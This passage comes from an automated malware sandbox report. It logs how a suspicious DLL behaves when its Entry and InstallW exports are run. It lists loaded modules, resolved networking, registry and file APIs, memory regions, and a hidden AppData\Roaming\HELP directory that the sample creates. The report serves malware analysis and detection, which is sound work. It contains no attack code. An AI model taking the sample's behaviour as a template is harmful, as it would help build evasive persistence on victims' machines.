| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97407 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #48: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #48 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcbc |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC0
0x
DC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x002a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x0115ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012d0000 | 0x012d0000 | 0x0144ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012d0000 | 0x012d0000 | 0x013cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001410000 | 0x01410000 | 0x0144ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97500 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #49: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcc8 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00390fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0091ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
